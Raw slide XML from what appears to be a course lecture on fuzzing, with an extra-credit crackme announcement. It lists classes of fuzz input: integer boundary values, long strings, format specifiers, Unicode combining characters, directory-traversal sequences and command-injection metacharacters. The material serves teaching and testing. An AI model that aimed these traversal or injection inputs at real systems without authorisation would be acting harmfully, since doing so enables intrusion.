              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Extra credit added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Real world crackme problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>should be a great challenge for anyone really wanting to do moar RE!  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>more difficult than the whole HW 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>worth up to +1% on final grade of extra credit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5080000"/>
            <a:ext cx="1638300" cy="1778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Generating fuzzed data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>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b="1" lang="en" sz="2400" u="sng"/>
              <a:t>What type of data should one fuzz an application with?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Integer values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Border (edge) cases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0, 0xFFFFFFFF (2^32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leverage +n or -n cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>malloc (.... + 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Ranges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>MAX32 – 16      &lt;= MAX32      &lt;= MAX32 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX32 / 2 – 16 &lt;= MAX32 / 2 &lt;= MAX32 / 2 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX32 / 3 – 16 &lt;= MAX32 / 3 &lt;= MAX32 / 3 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX32 / 4 – 16 &lt;= MAX32 / 4 &lt;= MAX32 / 4 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX16 – 16      &lt;= MAX16      &lt;= MAX16 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX16 / 2 – 16 &lt;= MAX16 / 2 &lt;= MAX16 / 2 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX16 / 3 – 16 &lt;= MAX16 / 3 &lt;= MAX16 / 3 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX16 / 4 – 16 &lt;= MAX16 / 4 &lt;= MAX16 / 4 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX8 – 16     &lt;= MAX8        &lt;= MAX8 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX8 / 2 – 16   &lt;= MAX8 / 2   &lt;= MAX8 / 2 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX8 / 3 – 16   &lt;= MAX8 / 3   &lt;= MAX8 / 3 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>• MAX8 / 4 – 16   &lt;= MAX8 / 4   &lt;= MAX8 / 4 + 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5513450" y="4051888"/>
            <a:ext cx="2823300" cy="2493000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Try to influence signed / unsigned values: char short, int, long, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unsigned value:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2^X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Signed value:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2^X  / 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Shape 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986525" y="4169763"/>
            <a:ext cx="526925" cy="2375125"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="95005" w="21077">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15100" y="9752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3775" y="42783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21077" y="42469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5977" y="48131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13527" y="85567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="944" y="95005"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5330600" y="6246688"/>
            <a:ext cx="1759200" cy="298200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cited from [1]</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Generating fuzzed data, cont</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 228"/>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b="1" lang="en"/>
              <a:t>String repetitions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A*10, A*100, A*1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>$./program $(perl -e 'print "A" x1000')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Not just 'A', 'B' makes a difference on the heap, and in hard coded anti-reversing checks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Delimiters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!@#$%^&amp;*()-_=+{}|\;:’”,&lt;.&gt;/?~`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Varying length strings separated by delims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>increasing length of delimiter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>User::::::::::::::::::::::::::::password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Format Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%s and %n have greatest chance to trigger a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%s dereferences a stack value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>%n writes to a pointer (another dereference)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Should fuzz long sequences (i.e. to cause crashes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207675" y="6446500"/>
            <a:ext cx="1759200" cy="298200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cited from [1]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Generating fuzzed data, cont</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Shape 235"/>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b="1" lang="en"/>
              <a:t>Character translations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xfe and 0xff are expanded into 4 characters under UTF16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xcc and 0xcd modifiers super and sub accents for UTF8 extended encodings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for instance: U̱̲ͫ́͗͆̽̈̆͞Ş͇̼̜̊̌ͮ̈̀̓̈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unpacked and decoded in python, this is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'U'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,'\xcd','\xab','\xcc','\x81','\xcd','\x97','\xcd','\x86','\xcc','\xbd','\xcc','\x88','\xcc','\x86','\xcd','\x9e','\xcc','\xb1','\xcc','\xb2',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'S'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,'\xcc','\x8a','\xcc','\x8c','\xcd','\xae','\xcc','\x88','\xcc','\x80','\xcd','\x83','\xcc','\x88','\xcc','\xa7','\xcd','\x87','\xcc','\xbc','\xcc','\x9c'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.utf8-chartable.de/unicode-utf8-table.pl?start=768&amp;number=128&amp;names=-&amp;utf8=0x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Directory Traversal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>targeting web apps,network daemons, etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>../../    and ..\..\     etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>important to try different character encoding (%5C = '\' in unicode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3586775" y="3036975"/>
            <a:ext cx="2172600" cy="4872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Generating fuzzed data, cont</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>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b="1" lang="en"/>
              <a:t>Metacharacter / Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>when targeting web apps, cgi scripts, network daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp;&amp;, ; --' and | characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>File types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>spoof magic number (unix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2-byte identifier at the beginning of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.gif's have magic numbers of GIF87a or GIF89a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>spoof file extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>content-meta data (in web traffic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>i.e. via intercept proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rt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Generating fuzzed data, cont (Networking)</a:t>
            </a:r>
          </a:p>
